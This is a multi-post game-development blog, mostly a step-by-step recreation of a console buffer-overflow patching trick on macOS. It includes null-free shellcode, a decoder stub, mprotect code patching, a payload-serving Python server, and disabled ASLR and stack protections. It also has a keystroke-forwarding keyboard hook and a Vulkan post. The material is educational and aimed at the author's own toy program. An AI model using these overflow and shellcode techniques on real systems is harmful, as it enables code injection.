
LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)
{
  const int BUFLEN = 512;
  char sendBuf[BUFLEN];
  memset(sendBuf, '\0', BUFLEN);

  if (sock == INVALID_SOCKET){
    sock = CreateClientSocket("localhost", "1337");
  }

  int isKeyDown = (int)lParam >> 30;
  if (isKeyDown){
    _itoa_s<512>((int)wParam, sendBuf, 10);
    send(sock, sendBuf, (int)strlen(sendBuf), 0);
  }
  return 1;
}

Extracting the key state from the lparam was a little weird, but it seemed like the best way to get at that information. If you wanted to write a more robust input handling hook, you’d probably care about more of the data in that parameter than I did, but this was enough for getting WASD.

Once this was working, it was a very small jump from there to a working real time game.

Snake, Finally!

So yeah, the fruit of all this labor isn’t super exciting. I made Snake. It lends itself super well to ascii graphics (even if the fact that characters are taller than they are wide is a bit annoying), and I already had the gameplay logic written from a couple posts ago.

There’s not really much interesting to say about implementing Snake, and I’ve already talked through everything else, so I’m going to end things off with another gif of me playing snake in a hijacked Notepad.exe window. I hope you enjoyed the process of getting here as much as I did, because the end product is (as promised) super dumb.

It's a terrible quality gif... but you get the idea

Recreating An Old "Dirty Gamedev Trick"

2019-12-04T00:00:00+00:00

There’s a story that pops up in my twitter feed every 6 months or so. The original version of it is from a Gamasutra article published in 2013 which contained a collection of stories of various “dirty” tricks used in previous games (link). There’s a lot of fun stories in the article but one stands head and shoulders above the rest in terms of awesomeness. I’ve copied the specific story below so that this post makes sense even in the unlikely event of the original link going dead.

(s)elf-exploitation
Jonathan Garrett, Insomniac Games

Ratchet and Clank: Up Your Arsenal was an online title that shipped without the ability to patch either code or data. Which was unfortunate.

The game downloads and displays an End User License Agreement each time it's launched. This is an ascii string stored in a static buffer. This buffer is filled from the server without checking that the size is within the buffer's capacity.

We exploited this fact to cause the EULA download to overflow the static buffer far enough to also overwrite a known global variable. This variable happened to be the function callback handler for a specific network packet. Once this handler was installed, we could send the network packet to cause a jump to the address in the overwritten global. The address was a pointer to some payload code that was stored earlier in the EULA data.

Valuable data existed between the real end of the EULA buffer and the overwritten global, so the first job of the payload code was to restore this trashed data. Once that was done things were back to normal and the actual patching work could be done.

One complication is that the EULA text is copied with strcpy. And strcpy ends when it finds a 0 byte (which is usually the end of the string). Our string contained code which often contains 0 bytes. So we mutated the compiled code such that it contained no zero bytes and had a carefully crafted piece of bootstrap asm to un-mutate it.

By the end, the hack looked like this:

1. Send oversized EULA
2. Overflow EULA buffer, miscellaneous data, callback handler pointer
3. Send packet to trigger handler
4. Game jumps to bootstrap code pointed to by handler
5. Bootstrap decodes payload data
6. Payload downloads and restores stomped miscellaneous data
7. Patch executes

Takeaways: Include patching code in your shipped game, and don't use unbounded strcpy.

Suffice to say that this story is not an example of what modern day game development is like, but I think that’s what makes it so appealing. Most of my day at work is spent sorting out problems in huge codebases made up of abstractions layered over other abstractions layered over third party libraries and legacy code. This is the polar opposite of that, and I want to get me some of it. So this is the story of how I recreated this on OS X.

I want to caveat the entire article by saying that this post is going to contain a lot of terrible assembly. I hadn’t written much assembly before I started this project and I’m sure it shows. That being said, let’s get started!

First: You Can Run Arbitrary Machine Code at Runtime?

The first thing that jumped out at me in this story was the part about sending machine code over the network to be executed by the game. It had never occurred to me that this was possible, despite it being obvious in hindsight. With some help from this article, I was able to prove that this was going to work on OS X too. First I wrote a quick bit of assembly (in this case, enough to call exit(42):

.text
.globl _main
_main:
        mov $42, %di
        movl $0x2000001, %eax
        syscall

Assembled it with OS X’s built in “as” tool, and disassembled it with objdump to get the hex machine code bytes:

1ff5:	66 bf 2a 00 	movw	$42, %di
1ff9:	b8 01 00 00 02 	movl	$33554433, %eax
1ffe:	0f 05 	syscall

Then I copied those bytes to a string and tried to run it:

int main(void)
{
    char* code = "\x66\xbf\x2a\x00\xb8\x01\x00\x00\x02\x0f\x05";
    ((void(*)())code)();
    return 0;
}

The above returns the value 42 and the “return 0” statement never gets executed, which is cool. However, this wasn’t enough to prove anything because it only worked when the code string was a constant. Trying to copy that string to a different (non-constant) buffer and then execute the instructions there failed immediately:

int main(void)
{
    char* code = "\x66\xbf\x2a\x00\xb8\x01\x00\x00\x02\x0f\x05";
    char buff[256];
    memcpy(buff, code, 256);
    ((void(*)())buff)(); // will fail with EXC_BAD_ACCESS 
    return 0;
}

As it turns out, OS X has memory protections to help prevent folks from doing these sorts of shenaningans. If you compile on the command line with the arguments “-Wl,-allow_stack_execute”, clang will happily let this code run just fine. In fact, that argument will allow the above code to work whether or not buff is on the stack, the bss section, or the data section.

Note that no matter what I did, I couldn’t get Xcode 10 to recognize that compiler flag, it had to be command line. It’s also important to note that if you compile objective-c code (or objective-c++) with this flag, the flag won’t work. I could be missing something, but I got bored and just fell back to the command line / plain C++ instead of continuing to fight with it.

The Playstation 2 was gone well before I entered the industry, but based on googling and asking a few coworkers who had some experience on it, it seems unlikely that the ps2 had the same kind of memory security, so I don’t feel too bad about disabling OS X’s to get this project done.

Step Two: Useful Buffer Overflows

My next goal was to use a buffer overflow to redirect a function pointer to a buffer that I controlled. I’d never intentionally overflowed a buffer before, but boy do I have experience tracking and fixing memory stomps, so this felt pretty natural (in theory). In practice it was a bit messier. Consider the following code:

void hello();

static char buff[32];
static void(*targetFunc)();

int main(int argc, const char** argv)
{
    targetFunc = hello;
    gets(buff);
    targetFunc();
    return 0;
}

void hello()
{
    printf("Hello World\n");
}

While this code will absolutely crash, it’s not guaranteed that the compiler has positioned the static variables in the bss section of our executable in the same order that they appear in the code. In my case, they were actually located in the opposite order in my executable, as you can see in this snippet of Hopper output.

                     __ZL10targetFunc:        // targetFunc
0000000100001020         dq         0x0000000000000000 ; DATA XREF=_main+29, _main+52
0000000100001028         db  0x00 ; '.'
0000000100001029         db  0x00 ; '.'
000000010000102a         db  0x00 ; '.'
000000010000102b         db  0x00 ; '.'
000000010000102c         db  0x00 ; '.'
000000010000102d         db  0x00 ; '.'
000000010000102e         db  0x00 ; '.'
000000010000102f         db  0x00 ; '.'
                     __ZL4buff:        // buff
0000000100001030         db  0x00 ; '.'                ; DATA XREF=_main+36
0000000100001031         db  0x00 ; '.'
0000000100001032         db  0x00 ; '.'
0000000100001033         db  0x00 ; '.'
; (buff continues below)

Unluckily, this means that try as I might, I couldn’t use the gets() call to change the value of the targetFunc pointer. After a bit of experimentation, I found that (at least for my trivial example), Clang places variables in the bss section in the order they’re encountered in code, so rewriting the code to assign to buff before the gets() call sorted things out (example below).

void hello()
{
    printf("Hello World\n");
}

static char buff[32];
static void(*targetFunc)();

int main(int argc, const char** argv)
{
    buff[0] = 'c';
    targetFunc = hello;
    gets(buff);
    targetFunc();
    return 0;
}

Of course, all of the above only holds true if both variables are located in the same section in the executable. If, for example, targetFunc was initialized when it was declared, like so:

static void(*targetFunc)() = hello;

It would be placed in the data section of the executable instead of the bss section (since it has an initial value). This doesn’t preclude me from overflowing (I don’t think), but it does mean that I also have to worry about the order that the compiler places the bss section and the data section in the executable. This seemed like more hassle than it was worth for the purposes of this project so I just kept everything in bss all the time.

It seemed like the above code made it possible for a properly crafted input string to overflow and write a new address into the function pointer, so I decided to give that a shot. The address of buff in my executable was 0x0000000100001020. In order to be able to enter this value to gets(), it needed to be converted to ascii. A lot of that address is zero bytes, which don’t have an ascii character associated with it, so I had to enter them in terminal by pressing control+space instead. The non zero bytes are 01, 10, and 20, two of which are non printable characters that I ended up copy and pasting from a website so that I didn’t have to figure out how to type them. The last one, 20, is the space character (‘ ‘). In terminal, it looked like this (note the space character at the end):

AAAAAAAAAABBBBBBBBBBAAAAAAAAAABB^@^@^@^A^@^@^P

Copying and pasting the above string is not the same as actually pasting in the ascii characters for bytes 01 and 10, this is just how terminal decided to display that those characters were entered.

In addition to being annoying to enter, this didn’t work because I had forgotten about endianness, and needed to rearrange this input so that the address was specified as a little-endian value. Figuring that out took longer than I’m willing to admit to in a blog post. The correct string looked like this:

AAAAAAAAAABBBBBBBBBBAAAAAAAAAABB ^P^@^@^A^@^@^@

Finally though, I could demonstrably (using lldb to print the address of targetFunc) use a buffer overflow to set a pointer. Sadly, if I tried the same trick without lldb attached, things failed horribly. It turns out OS X had one more security feature up it’s sleeve to stall my plan of creating the world’s most insecure application.

A/S/L…R?

ASLR, or Address Space Layout Randomization, is a security technique that rearranges the locations of key areas of an executable’s data, including (at least on OS X Mojave) the .bss section. This means that every time I ran the test application without lldb attached, the address of the character buffer was randomized.

The concept of ASLR was first published in 2001, and first used in a “mainstream” OS in 2003 (according to wikipedia at least). Given that the PS2 was launched in 2000, I’m relatively confident that there was nothing like this on our story’s hardware. I also found this presentation about game console security which suggests that ASLR didn’t make an appearance on Sony consoles until the PS4. This means that just like before, I can feel good about simply disabling this security feature on my executable. This is accomplished by another clang flag, “-Wl,-no_pie”, where pie refers to “position indepent executables.” Unlike earlier however, this flag can be enabled in an Xcode project, you just need to go to your build settings and enable the setting “Generate Position-Dependent Executable.”

Compiling with that flag gave me a lovely little binary which kept the buff variable at the same memory address all the time.

Step Three: Putting Things Together

Now that I was properly redirecting the targetFunc pointer to my buffer, it seemed like the next step was to actually write some code into that buffer to execute. To keep things simple, I started out by reusing the code string that called exit(42) earlier. Unfortunately, a lot of the hex values in my code string couldn’t be represented in ascii at all, so I decided to abandon using gets() and wrote a small python server to pass the code string to my program over a socket. I was going to need to do this eventually anyway so this felt like progress.

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
address = ('localhost', 10002)
s.bind(address)
s.listen(1)

while True:
    connection, addr = s.accept()
    connection.send(b"\x66\xbf\x2a\x00\xb8\x01\x00\x00\x02\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x10\x00\x00\x01\x00\x00\x00")

This also meant making my example program a bit more complicated:

#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <cstring>
#include <stdio.h>

static char buff[32];
static void(*targetFunc)();

void hello()
{
    printf("Hello World\n");
}

int main(void)
{
    buff[0]='c';
    targetFunc = hello;
    const int SERVER_PORT = 10002;
    const char* SERVER_ADDRESS = "127.0.0.1";
    const int BUFF_LEN = 64;

    struct sockaddr_in sockAddr = {0};
    sockAddr.sin_family = AF_INET;
    sockAddr.sin_port = htons(SERVER_PORT);
    inet_pton(AF_INET, SERVER_ADDRESS, &sockAddr.sin_addr);
    int socketHandle = socket(AF_INET, SOCK_STREAM, 0);
    
    connect(socketHandle, (struct sockaddr*)&sockAddr, sizeof(sockAddr));
    
    recv(socketHandle, &buff, BUFF_LEN, 0);
    targetFunc();
    return 0;
}

Running this totally worked as long as I had disabled aslr. I stopped here to celebrate by becoming bored with the project and abandoning it for a month.

Modifying Existing Instructions

Downloading and executing assembly code was already pretty awesome, but given that my end goal was to be able to patch a game using this system, it seemed like it would be way cooler if I could use that assembly to fix bugs in different parts of the program. I’d already used mprotect to mark pages as Read/Write protected in other project (for tracking memory stomps), so it wasn’t a huge stretch to use it to mark pages as executable instead. I still wrote a small test program to make sure it worked.

When running in debug, the code below will return 0 instead of 42, because it modifies the shouldExit42() function to return false. Clang will optimize away the memcpy operation if you compile above -O0, but that didn’t really matter to me because, in the real project, I was going to be hand writing the assembly to do this.

#include <sys/mman.h>
#include <memory>
#include <unistd.h>
#include <stdint.h>

bool shouldExit42()
{
    return true;
}

bool shouldNotExit42()
{
    return false;
}

int main(int argc, const char * argv[])
{
    int64_t pagesize = getpagesize();
    
    uint8_t* should = (uint8_t*)&shouldExit42;
    uint8_t* shouldNot = (uint8_t*)&shouldNotExit42;

    int64_t shouldPageAddr = pagesize * (int64_t(should)/pagesize);
    uint8_t* shouldPage = (uint8_t*)shouldPageAddr;
    
    mprotect(shouldPage, pagesize, PROT_READ|PROT_EXEC|PROT_WRITE);
    
    memcpy(should,shouldNot, 64);
    
    return shouldExit42() ? 42 : 0;
}

Now, technically the above code is relying on undefined behaviour because the POSIX standard specifies that the behaviour of mprotect is undefined unless it’s operating on an mmap’d pointer, but OS X Mojave seems happy to just do what I want this way. Also, the 64 byte size in the memcpy call is total garbage that I pulled out of the air, but it was good enough for the test program.

One caveat to patching code this way is that any changes need to keep the target function the same size, since this won’t move around the rest of functions in memory (and I don’t even want to think about trying that). Alternatively, it’s possible to add entirely new functions, assuming there’s memory available to store it. I already kinda did this above when I stored assembly code in a buffer and executed it there, so I’m not going to belabour the point any more.

Goodbye Test Programs, Hello Snake

Finally, I felt like I knew enough to try out actually recreating the gamasutra story in a real project, and I built a small game to use as the target executable. I started out with a tile matching game that used metal for graphics, but got tired of fighting with making -allow_stack_execute work in a project that included objective-c code, so I scrapped that and built a quick snake game with ncurses. The game sucks, but that’s not really the point, so as you’re reading, you could try to pretend that I’m talking about some totally awesome AAA project instead if it helps.

The (awful) code is up on github here. Most of it doesn’t matter, but a few bits are relevant to this blog post. First is how I’ve set up a few key static vars:

static char eula[1024];
static void(*packetHandler)();
static int randomSeed;

int main()
{	
    memset(eula,0,EULA_LEN);
    randomSeed = 42;
    packetHandler = handleNotificationPacket;
    //rest of code omitted

Clang is going to position these static variables in the bss section in the order they’re first encountered when parsing code (or at least, that’s what it did in all my tests), so any attempt to overwrite the packetHandler pointer by overflowing the eula buffer also needed to stomp on whatever value is stored in randomSeed. Part of my payload’s job was going to be making sure that the randomSeed value was set back to 42 before it got used by the game.

The game starts by downloading data from a server and strcpying it into the EULA buffer. Immediately after the server sends the EULA, it’s also going to send the packet that will trigger a call to the packetHandler() function. I couldn’t do squat until I got packetHandler pointed to the eula buffer, so that’s the first thing I did. This was a little trickier than the last time I used an overflow to set a pointer because now the machine code was getting strcpy’d, meaning it couldn’t contain any null bytes. Initially though, this didn’t matter, since I just wanted to set the packetHandler pointer (which was at 00000000000092b0), and being little-endian means that I only actually needed to write the value 0x92b0.

Put together, this initial step looked like so:

Launch Snake, have it connect to the server
Have the server send 1024 bytes of \x01 to fill the eula buffer
Send 4 bytes of \x02 to fill the random seed.
Send another 4 bytes of \x03 to fill the padding between randomSeed and the function pointer
Send \xB0\x92\x00 to update the function pointer and end the string

Since it’s a bit long, I won’t show the python I used to do this here, but if you’re interested, you can check it out here.

That part was pretty easy, but once it was working, the game would immediately crash when it received the packet triggered a call to packetHandler() since there was nothing of value in the EULA buffer. This kinda sucked, so my next step was to have the EULA buffer actually do something. As a proof of concept, I started by re-purposing the exit(42) code string that I used earlier. The original code string had a few null bytes in it though, so it needed some massaging. As a refresher, here was the original bit of machine code:

\x66\xbf\x2a\x00\xb8\x01\x00\x00\x02\x0f\x05

Luckily the original code could be refactored pretty simple to work around the problem. I just added a few unnecessary math operations to avoid needing any instructions with null bytes in them:

.text
.globl _main
_main:
        mov $25400, %di
        sub $25358, %di
        mov $0x2, %al
        shl $24, %eax
        add $0x1, %al
        syscall

Assembling this with as and using objdump to get me the hex bytes gave me the following, strcpy friendly, machine code:

\x66\xbf\x38\x63\x66\x81\xef\x0e\x63\xb0\x02\xc1\xe0\x18\x04\x01\x0f\x05

Modifying the python server script to send this was just a matter of replacing the first set of \x01 bytes with this code string, and boom, the snake game was returning the value 42 before I had a chance to accept the EULA. This was great, but it didn’t feel like my plan of rewriting assembly to avoid null bytes was going to be very scalable when I tried to do real work. The original story talked about needing to encode/decode instructions to allow null bytes to be sent, so that was my next project.

Encoding/Decoding Null Bytes

I don’t know if the team at Insomniac did something more fancy, but for my purposes, all I needed to do was replace all null bytes in my machine code string with 0xCD and write some assembly that walked the bytes of the eula buffer (after strcpy) instances of 0xCD with 0x00. I may have just gotten lucky, but none of the code that I wrote for the rest of this project ever had a problem with a valid 0xCD byte getting accidentally stomped by this.

To get the machine code string for this bit of assembly, I actually just ended up writing it as a separate program and extracting the hex bytes using Hex Fiend

.text
.globl _main
_main:
        movabsq $0x1111111111111111, %rax
        movabsq $0x1111111111107E26, %rcx
        subq %rcx, %rax  # result of sub is addr of code after decode block
        mov %rax, %rdx
        mov $0xFFFF, %dx
        sub $0xFFFF, %dx # zero dx without getting a null in machine code 
# loop starts here
        cmpb $0xCD, (%rax)
        jne .+6 
        subb $0xCD, (%rax)
# jump to here if not == 0xcd
        add $0x1, %rax
        add $0x1, %dx
        cmp $0x3D0, %dx # 1035 bytes total, 59 bytes for bootstrap, decode next 976 bytes
        jb .-21
        # int $3 # uncomment to break in debugger here
        ret # end bootstrap

Getting this working was a lot of trial and error (mostly because I hadn’t written much assembly before). I also got tripped up for awhile because I was originally messing with some caller save registers and not cleaning them up, which caused weird problems later. Also, I couldn’t get labels working with the code I was sending over the wire, so I was stuck with jmp-ing to addresses. Jmp-ing to an absolute address seemed to work if I provided an address in a register, but apparently conditional jumps REQUIRE a relative address, which was a pain.

If you’re trying something like this on your own, My standard workflow was to put a breakpoint on the eula buffer, sprinkle my assembly liberally with int $3 calls (which cause the debugger to break there), and then examine the memory of the target buffer with an lldb command like “memory read –size 1 –format x 0x92b0 –count 1024”.

Despite all my complaining though, it did work once I had ironed out all the kinks, which meant it was time to actually do something interesting to the snake game.

Patching Some Code Like a Hacker

The first thing I wanted to do was change some code that shipped with the game. In this case, I wanted to change the point value for hitting a target from 3 to 15. The score value for a target was hardcoded in the code snippet below, so changing it required modifying currently loaded machine code, just like I did in the sample project earlier.

void SnakeGame::tick()
{
    if (currentMode == PLAYING)
    {
        inputMutex.lock();
        Point newHead = {snakeSegments.front().x + velocity.x, snakeSegments.front().y + velocity.y};
        inputMutex.unlock();

        if (newHead.x == targetPos.x && newHead.y == targetPos.y)
        {
            score+=3;
            //rest of code omitted because it isnt important

It was time to fire up Hopper again, this time to figure out the address of this instruction. The tick function itself is located at address 0000000000004100 (as shown below). Working from there, the first add $0x3 instruction (which turned out to be the correct one) is located at 4199.

The page that contains the tick function starts at 0000000000004000, so thats the address I’m going to feed to memcpy. On Mac, memcpy is system call 200004A, so the assembly to mark this page as PROT_READ + PROT_WRITE + PROT_EXEC looked like the following:

_markpage:
    movl $0x200004A, %eax # 4A is the mprotect syscall
    movabsq $0x0000000000004000, %rdi # first arg is page addr, this is the addr of tick
    movq $4096, %rsi # second arg is len, we want 1 page
    movq $7, %rdx # third arg is flags
    syscall

If you’re unfamiliar with how system calls work on mac, you may want to read this article, which was extremely helpful when I was figuring all this out.

After marking the page as writeable, all that I needed to do was to modify the byte at address 0x000000000000419B, which was the byte containing the score value for the target that was hardcoded into the add instruction. Changing that from 3 to 15 just required a move:

_fixscore:
        movabsq $0x000000000000419B, %rax # move location of score add instruction to rax
        movb $0x0F, (%rax)

Similarly, I also took this time to write 42 back to our random seed variable:

_randomseed:
        movabsq $0x00000000000096b0, %rax 
        movq $42, (%rax) # write 42 back to the random seed var

I should note that I’m providing labels in the assembly snippets above that I didn’t actually have in my assembly code, to aid readability. It’s a bit lengthy to paste right into the article, but my entire assembly payload up to this point looked like this (note the string of nop instructions I used to make reading lldb output easier). By now, manually changing null bytes to 0xCD in the machine code was getting tedious, so I wrote a small script to do that manually. My workflow now looked like this:

Write some assembly
Assemble it with “as”
Get the machine code using Hex Fiend
Paste that into textedit and remove all whitespace
Use my script to swap null bytes for CD
Add the few bytes for overflowing the buffer / setting packetHandler to the end
Double check to make sure the resulting string was still the right size (add extra 0xCDs until it is)
Paste the code string into the python server
Run the server and the game.

I probably should have combined a few more of those steps into a utility program, but it’s a bit late for that now.

At this point, I had successfully managed to change the score value for targets in the game, and was feeling pretty super. However, that wasn’t enough for me to be satisfied that I had actually recreated the entire gamasutra story, so there was still more work to do.

Downloading a Real EULA

Up to now, when the game displayed the EULA, it ended up displaying garbage bytes, because the eula buffer contained our code string. I wanted to fix that by having the payload include instructions for downloading a real EULA string from the server. The original story also mentioned having the payload download additional data, although technically the it reads like they downloaded more machine code… I’m not going to split hairs.

Setting up a socket connection in assembly isn’t super exciting, given that socket(), connect(), and recvfrom() are all syscalls on OS X, so there’s nothing exotic about it really. I had so far gotten by without allocating any stack variables (and as such, needing to clean those up), so I ended up reserving the last chunk of the eula buffer to use to store the sockaddr structure I was using, but that’s about as weird as it got. I also hardcoded the values of the sockaddr struct (by writing a C program to set it up and just copying the bytes from the sockaddr struct it created) rather than calculating them the normal way to save some time. Setting all this up looked like this:

_SetUpSocket:
    movl $0x2000061, %eax #  61 is socket
    movq $2, %rdi # first socket arg - AF_INET
    movq $1, %rsi # second socket arg - SOCK_STREAM
    movq $0, %rdx # third socket arg - protocol
    syscall # call socket, socket handle in eax
    movq %rax, %rdi # move socket handle to ebx
    movl $0x2000062, %eax # next syscall will be to connect
    movabsq $0x00000000000096a1, %rsi 
    movb $2, (%rsi) # now write the sockaddr bytes
    add $1, %rsi
    movb $0x27, (%rsi)
    add $1, %rsi
    movb $0x15, (%rsi)
    add $1, %rsi
    movq $0x7f, (%rsi)
    add $3, %rsi
    movq $1, (%rsi)
    movabsq $0x00000000000096a0, %rsi # second arg to connect is address of sockaddr struct, located in our buffer (pre-zeroed by bootstrap)
    movq $16, %rdx # third arg is len of sockaddr
    syscall

Since I wanted to download the new EULA string into the same buffer that the payload code currently lived, I ended up adding a huge string of NOP instructions before calling recvfrom, and limiting the size of the EULA string so that it wouldn’t stomp on instructions that still mattered. So immediately after the code above, there was a long string of 700 NOP instructions before I actually called recvfrom and then returned from the function. This last bit of assembly looked like this:

_downloadeula:
        movl $0x200001D, %eax # next syscall will be to recvfrom
        movabsq $0x00000000000092b0, %rsi # second arg is address of this buffer
        movq $512, %rdx # third arg is len, eula will be up to 512 bytes 
        movq $0x0, %r10 # fourth arg is flags
        movq $0x0, %r8 # fifth arg is socket ptr, use null since we have a connected socket
        movq $0x0, %r9 #  ignore 
        syscall
        ret

If you’re curious, the entire source for this payload is both here and on the github project that accompanies this blog post. Note that the payload code doesn’t exactly match the code string in the final python server script, since I was manually adding padding and replacing some NOPs with 0xCD, as described earlier.

With this payload in place, getting a proper EULA was just a matter of adding a few more lines to the server script to listen for a connection on port 100005 and send back the string when it received that connection. You can see the final server script here if you’re curious. Once that was working, I could send a EULA that was human readable to the client in time to hide the fact that anything nefarious was going on, and my server was able to modify compiled code using a buffer overflow. Woohoo!

Conclusion / References

This was a super cool project to work on, despite it occasionally taking a turn for the very tedious. I learned a ton about areas of programming that I had never had a chance to dabbble in before, and feel like I came away from it with a better understanding of how software works in general.

Given how little I knew when I started this, I used a ton of different blog posts and articles to help get me up to speed (in addition to the ones linked explicitly above), and I wanted to list them here in case any are of interest to anyone else. So, in no specific order, here they are:

I also want to link again to Hopper and Hex Fiend which made my life way easier. Hopper in particular is a really impressive bit of software, and I get an excuse to use it again in the future.

If you want to say hi, or ask any questions about anything in the article, I’m available (sporadically) on Twitter! Thanks for reading!

I Wrote A Book About Shaders!

2019-04-18T00:00:00+00:00

From the looks of my blog archive, it’s been 13 months since I dropped off the map and stopped posting. That’s because around that time I got an e-mail from Apress Books asking if I wanted to write for them. I’ve gotten several messsages like this since I started writing my blog, but this one was different in two key ways:

They didn’t have a book idea in mind already, instead, they wanted to know what I might like to write.
Their sales pitch was “you’re already writing about technical things, why not get paid for it?” which I found pretty convincing.

So I replied to the e-mail, and pretty quickly I decided that I wanted to write a book with them, and now you can purchase that book (Amazon link)! The schtick of it is that it’s an example based approach to learning shaders. If you’ve never written a shader before, and want to get your feet wet and learn a few things without necessarily needing to learn a ton of math or graphics api details, this is the book for you. It’s not super technical, it’s really more about having some fun and building a bunch of different things.

Here's what it looks like!

It’s kind of surreal to be holding a physical copy of this thing. Both because it’s the first physical thing that I’ve produced in my career, and because I can’t believe this project is finally finished. So to celebrate, here’s a disorganized collection of thoughts I have about the whole experience.

Writing A Book Is Hard Work

When I started this project I honestly didn’t think it was going to be that much different from regularly writing blog posts. Having now done both, let me say very clearly that writing a book is nothing like writing blog posts. Not only do blog posts not have deadlines, but they can jump around, and can assume any level of ability on the part of your readers, and you can always delete or edit a blog post if you get something wrong. Writing a book is 1000% harder than writing a blog.

There were a lot of days that I didn’t feel like writing. Hell, there were a lot of weeks where I didn’t feel like writing. When people asked how writing was going, my standard answer was “the fun runs out after page 100,” which, depending on the day, was either just a funny default response, or painful truth. I’m completely convinced that books are mostly written out of pure stubbornness, and that the people who write books aren’t necessarily the most qualified people to write about that topic, but they are perhaps the most qualified people to write about that topic that feel like finishing a book.

Finishing A Book Is Scary

Speaking of finishing a book, that’s a scary proposition in itself. By the time things were done, I was both relieved to be done writing and terrified at how many things I knew that I would change if I had more time to work on the project. Now I’m just hoping that there aren’t any huge and embarassing content mistakes that slipped through the cracks.

Just like making games, having a final deadline where you have to ship the thing is probably the only way that a lot of books ever see the light of day. Without that, by the time I felt ready to publish we’d all be rendering things with quantum computers that path trace on the blockchain, and the book wouldn’t be relevant any more. So instead, I’ve just had to come to grips with the fact that the book isn’t perfect, but it’s done, and that’s ok.

Finishing A Book Is Pretty Great Too

Despite all my complaining, getting the copies of my book in the mail was pretty amazing. Actually finishing the project and seeing the end result has been hugely rewarding, and I’m really glad that I stuck with things until the end. Hopefully people like the book, but even just following through on a large personal project is a great feeling.

Apress Was Pretty Great To Work With

There are lots of horror stories floating around about working with publishers like Packt or Apress, but I have a lot of good things to say about them. The folks that I talked to day to day were professional, easy to work with, and always accommodating when I needed to move a chapter deadline because work was going crazy (I’m a stickler for schedules and deadlines, so they may have been flexible because this only happened a couple of times). They also paid me on time, which seems to be a common thing that other people complain about with technical book publishers.

I was a bit surprised at how little the copy editing team there corrected my grammar and sentence structure, but given how many other mistakes they caught that would have been disastrous to actually print in a book, I can’t say I’m too upset about it. It’s not like I was writing the next great Canadian novel. I also didn’t express this concern to Apress during the copy editing phase of the book, so this is also on me.

I Don’t Want To Write For A While

I think it’s fair to say that I’m a burnt out on writing right now. Even though it’s been a few months since I’ve had to do a lot of writing for the book, I still don’t have much desire to start writing blog posts again, and I think I’m going to write a lot less this year in general. Instead, I want to spend more time learning new things and working on things that don’t necessarily translate into a good blog post. Hopefully by the time I feel like writing again, I’ll have some new, interesting things to share.

Hopefully some of you pick up the book and learn a thing or two! In the mean time, I’m always available to chat on on Twitter. If you want to make my day, shoot me a message if you grab a copy. Have a good one!

A "Bind Once" Approach to Uniform Data

2018-02-05T00:00:00+00:00

After figuring out how to use a global array of textures to store all the textures that are in use for a frame in a single descriptor set, I returned to my material system project and realized how much easier life would be if I could do all my descriptor set binding at the beginning of a frame, both because I’d avoid any performance overhead from doing lots of binding, and because it greatly simplifies anything related to descriptor set versioning (or dealing with updating buffers that are in flight).

As it turns out, this is totally possible and really easy to do, although I have no idea if it’s a good idea in the grand scheme of things. Also, just like using an array of textures, I couldn’t find anyone else writing about, so I guess that means it’s on me to share.

So with all that said, this post is going to show off how to use a single, globally bound descriptor set (and a single VkBuffer!) to store all the uniform data needed for multiple objects that are using different shaders.

I’ve set all this up in a demo project (on github) if you just want the code. The fragment shaders I used in that demo are:

#version 450 core
#extension GL_ARB_separate_shader_objects : enable

struct Data48
{
    vec4 colorA;
    vec4 colorB;
    vec4 colorC;
};

layout(binding = 0, set = 0) uniform DATA_48
{
    Data48 testing[8];
}data;

layout(push_constant) uniform PER_OBJECT
{
    int dataIdx;
}pc;

layout(location=0) out vec4 outColor;

void main()
{
    outColor = data.testing[pc.dataIdx].colorA
            + data.testing[pc.dataIdx].colorB
            + data.testing[pc.dataIdx].colorC;
}

and

#version 450 core
#extension GL_ARB_separate_shader_objects : enable

struct Data48
{
    float r;
    vec4 colorB;
    int x;
};

layout(binding = 0, set = 0) uniform DATA_48
{
    Data48 data[8];
}data;

layout(push_constant) uniform PER_OBJECT
{
    int dataIdx;
}pc;

layout(location=0) out vec4 outColor;

void main()
{
    float red = data.data[pc.dataIdx].r;
    float intCast = data.data[pc.dataIdx].x;
    vec4 colorA =  vec4(red, intCast, intCast, intCast);
    outColor = data.data[pc.dataIdx].colorB * colorA;
}

I’ll omit the vert shader because it just passes through uv coords and does nothing fancy. The stars of our show are the ones above.

How This All Works

The trick, which you may have already guessed from the shader code, is to keep all the uniform buffer objects the same size. VkDescriptorSets, and VkBuffers don’t actually care about the contents of your uniform buffers, otherwise we’d have to provide a lot more information when setting up a descriptor set binding. All they care about is how big the buffer needs to be.

Knowing that, it follows that if all our shaders are using buffers of the same size, they should all be able to use the same descriptor set, and that’s exactly how things work in practice. It’s almost embarrassing how easy it is to set up the descriptor set layout to do this:

VkDescriptorSetLayoutBinding layoutBinding;
layoutBinding.descriptorCount = 1;
layoutBinding.binding = 0;
layoutBinding.stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT;
layoutBinding.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER;
layoutBinding.pImmutableSamplers = 0;

VkDescriptorSetLayoutCreateInfo layoutInfo = {};
layoutInfo.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_LAYOUT_CREATE_INFO;
layoutInfo.bindingCount = 1;
layoutInfo.pBindings = &layoutBinding;

vkCreateDescriptorSetLayout(...)

You don’t even need to worry about specifying the number of elements in the array, since it’s all stored in a uniform block. As far as the descriptor set is concerned, we’re not even using an array.

Once you’ve set up your Descriptor Set Layout, allocating the buffer to store the data is similarly easy. I’m going to just copy + paste the utility function call from my demo project, because allocating a buffer and memory associated with it in vulkan has a lot of boiler plate, but in reality, all you do is create a buffer large enough to hold the array you declared. So if you have an array of length 8, that stores 48 byte structures, you’re buffer needs to be 8 * 48 (384) bytes large.

vkh::createBuffer(demoData.sharedBuffer,
    demoData.bufferMemory,
    SHARED_UNIFORM_SIZE * BUFFER_ARRAY_SIZE,
    VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT | VK_BUFFER_USAGE_TRANSFER_DST_BIT,
    VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT,
    appContext);

And finally, once you’ve put the data into that buffer writing the descriptor set is also about as straightforward as possible.

VkDescriptorBufferInfo bufferInfo = {};
